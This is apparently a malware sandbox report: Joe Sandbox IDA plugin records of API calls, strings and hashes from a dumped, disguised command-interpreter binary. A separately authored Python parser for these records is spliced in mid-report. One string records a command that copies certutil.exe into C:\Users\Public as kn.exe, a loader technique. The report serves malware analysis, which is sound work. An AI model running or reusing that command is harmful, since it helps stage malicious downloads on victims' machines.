                                                                                                                                                                        • API String ID: 2748242238-2468825380
                                                                                                                                                                        • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                                                                        • Instruction ID: 655fa947be2b51b3f90572ffcd6b9b1239f1dfb369a84b7a82002525856af110
                                                                                                                                                                        • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                                                                        • Instruction Fuzzy Hash: 55A17AA3708AC2CAEB258F6098503E977A1FF85B85F408135DA4D8BB88DF3DD649C705
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E9436677
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E943668F
                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF6E94366A3
                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF6E94366C4
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E94366E4
                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6E9436570,?,?,?,?,?,?,00000000,00007FF6E9436488), ref: 00007FF6E94366FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                        • Instruction ID: 477acbd761238d7741ba9b8eca1c649ce31b9eb53aa349a22d964059ce737e0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C716B63D08A47C6E7609F31D41927D77A0EF49B84F94C031DA4E86294EF3EA488CB1A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
• String ID: FAT$~
• API String ID: 2238823677-1832570214
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D884
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D89D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D94D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942D964
• _wcsnicmp.MSVCRT ref: 00007FF6E942DB89
• wcstol.MSVCRT ref: 00007FF6E942DBDF
• wcstol.MSVCRT ref: 00007FF6E942DC63
• memmove.MSVCRT ref: 00007FF6E942DD33
• memmove.MSVCRT ref: 00007FF6E942DE9A
• longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6E942FE2A), ref: 00007FF6E942DF1F
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
• String ID:
• API String ID: 1051989028-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
• API String ID: 3223794493-3086019870
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID:
• String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
• API String ID: 0-3124875276
APIs
  • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
  • Part of subcall function 00007FF6E943081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E943084E
• towupper.MSVCRT ref: 00007FF6E944C1C9
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944C31C
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6E944C5CB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
• String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
• API String ID: 2242554020-619615743
APIs
• memset.MSVCRT ref: 00007FF6E9437013
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9437123
  • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943706E
• wcsncmp.MSVCRT ref: 00007FF6E94370A5
• wcsstr.MSVCRT ref: 00007FF6E943F9DB
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA00
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA5F
  • Part of subcall function 00007FF6E943823C: FindFirstFileExW.KERNELBASE ref: 00007FF6E9438280
  • Part of subcall function 00007FF6E943823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E943829D
  • Part of subcall function 00007FF6E9433A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E943FA3D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
• String ID: \\.\
• API String ID: 799470305-2900601889
                                                                                                                                                                        • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                                                                        • Instruction ID: 3818eb19fcad8224533479dbe03dc5431e07b6702dfe1434412637a1ea169317
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                                                                        • Instruction Fuzzy Hash: B9518D33A08A82C6EB60DF31A8043B967A0FF89B94F454535DA5E87794DF3ED549C305
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
• String ID:
• API String ID: 1944892715-0
• Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
• Instruction ID: bd09b106be35f47bc70c954fda5148d5f205fe5e28627557b3a28b89fbc45013
• Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
• Instruction Fuzzy Hash: F5B16D73A09742C6EB649F62A4543BD66A0FF59B80F448135CA4EC7391EF3EE448C70A
APIs
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
  • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
  • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
  • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
• _get_osfhandle.MSVCRT ref: 00007FF6E94254DE
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E942552B
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E942554F
• _get_osfhandle.MSVCRT ref: 00007FF6E944345F
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E944347E
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E94434C3
• _get_osfhandle.MSVCRT ref: 00007FF6E94434DB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E94434FA
  • Part of subcall function 00007FF6E94336EC: _get_osfhandle.MSVCRT ref: 00007FF6E9433715
  • Part of subcall function 00007FF6E94336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9433770
  • Part of subcall function 00007FF6E94336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433791
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
• String ID:
• API String ID: 1356649289-0
• Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
• Instruction ID: 595740f22b6bf03af0a132f81c4a85c379547639df88160ef9ea5fe091e80cb2
• Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
• Instruction Fuzzy Hash: 67917033A08642D7EB289F21A50427DB6A1FF89B84F484135DE4E83795DF3EE449CB09
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: LocalTime$ErrorLast_get_osfhandle
• String ID: %s$/-.$:
• API String ID: 1644023181-879152773
• Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
• Instruction ID: 5a0ab57edb512f36f9b822ff7e0aacd5c21040a458118f7d232b545be75b4d19
• Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
• Instruction Fuzzy Hash: 73918C63A18642D1FF109F64D4503FA63A0FF84B94F844136DA4EC6795EE3EE54ACB0A
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
• Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
• Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction Fuzzy Hash: E1412C33A08682C3F7604F55E40037A66B1EF86781F649131D90AC6A94DF3EE84EDF06
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
• String ID: $Application$System
• API String ID: 3377411628-1881496484
• Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
• Instruction ID: 1e25517e6ea00493b6777d5c8daac7f8a0d57e9a088d7acf854aa63bbb6e4c8d
• Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
• Instruction Fuzzy Hash: 23410473B08A42DAE7209FA0E4403ED77A5FB89748F445235DE4E82B98EF39D149C745
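The records above are the per-function output of the Joe Sandbox IDA plugin, and in a report with hundreds of them they are easier to query than to read. The Python below is an added example, not code from the report or from Joe Security: it parses records in exactly that layout (the constructed SAMPLE is copied from the blocks on this page), strips the "Download File" link residue from the Associated entries, checks two regularities that hold for every record shown (the second number of API String ID is 0 exactly when String ID is empty, and Opcode Fuzzy Hash repeats Opcode ID), and indexes functions by the APIs they resolve. It assumes a record begins at each "APIs" heading and that "$" is only ever a separator inside API ID and String ID; parse_records, api_groups, strings, check_invariants and index_calls are my own names.

```python
"""Parse Joe Sandbox "Similarity" records (the IDA plugin blocks above) into
dicts so function hashes and API sets can be queried instead of read by eye.
Added example, not code from the report or from Joe Security. Assumptions:
a record starts at each "APIs" heading, and "$" only ever separates entries
in "API ID" / "String ID"; every helper name below is my own."""
import re
from collections import defaultdict

# Constructed sample: three records in the report's own layout (values copied from the page).
SAMPLE = """\
APIs
• _get_osfhandle.MSVCRT ref: 00007FF6E94254DE
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6E9421F7D), ref: 00007FF6E942552B
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8), ref: 00007FF6E94335ED
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
• String ID:
• API String ID: 1356649289-0
• Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
• Instruction ID: 595740f22b6bf03af0a132f81c4a85c379547639df88160ef9ea5fe091e80cb2
• Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
• Instruction Fuzzy Hash: 67917033A08642D7EB289F21A50427DB6A1FF89B84F484135DE4E83795DF3EE449CB09
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
Strings
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
• Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
• Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
• Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
APIs
Similarity
• API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
• String ID: $Application$System
• API String ID: 3377411628-1881496484
• Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
• Instruction ID: 1e25517e6ea00493b6777d5c8daac7f8a0d57e9a088d7acf854aa63bbb6e4c8d
• Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
"""

# "• Key: value" metadata bullet; keys are letters and spaces only, so API call bullets never match.
FIELD_RE = re.compile(r"^• ([A-Za-z ]+?): ?(.*)$")
# "• Name.Module(args), ref: addr", optionally prefixed with the subcall the API lives in.
CALL_RE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[\w\-]+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

def parse_records(text):
    """Return one dict per function record: metadata fields, resolved calls, associated dumps."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every record in the report opens with this heading
            cur = {"calls": [], "associated": []}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                            # other headings ("Strings", "Similarity", ...) carry no data
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({"name": m["name"], "module": m["mod"], "ref": m["ref"], "sub": m["sub"]})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "Associated":
            cur["associated"].append(val.removesuffix("Download File"))  # page's download-link residue
        else:
            cur[key] = val
    return records

def api_groups(rec):
    """'API ID' is '$'-joined groups of concatenated API names; split only on the separator."""
    return [g for g in rec.get("API ID", "").split("$") if g]

def strings(rec):
    """'String ID' is '$'-joined referenced strings (a leading '$' is an empty first entry)."""
    return [s for s in rec.get("String ID", "").split("$") if s]

def check_invariants(rec):
    """Regularities seen in every record on this page: the second number of 'API String ID'
    is 0 exactly when 'String ID' is empty, and 'Opcode Fuzzy Hash' repeats 'Opcode ID'.
    A violation on real input most likely means the text was mis-split, not a new finding."""
    _, _, string_hash = rec["API String ID"].partition("-")
    return (string_hash == "0") == (rec["String ID"] == "") and rec["Opcode Fuzzy Hash"] == rec["Opcode ID"]

def index_calls(records):
    """Map each API name to the Instruction IDs of functions that reach it (directly or via a listed subcall)."""
    idx = defaultdict(set)
    for rec in records:
        for call in rec["calls"]:
            idx[call["name"]].add(rec["Instruction ID"])
    return idx
```

Run `parse_records` over the whole function section of a report and `index_calls` answers "which functions reach WriteConsoleW or WaitForSingleObject" by Instruction ID, which is the identifier to carry into a diff against a clean copy of the binary the dump was taken from. The subcall bullets are kept (with `sub` set to the enclosing function's address) because the report lists them as part of the caller's API surface, and dropping them would hide calls like GetConsoleMode that only appear through a helper.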
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
• Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
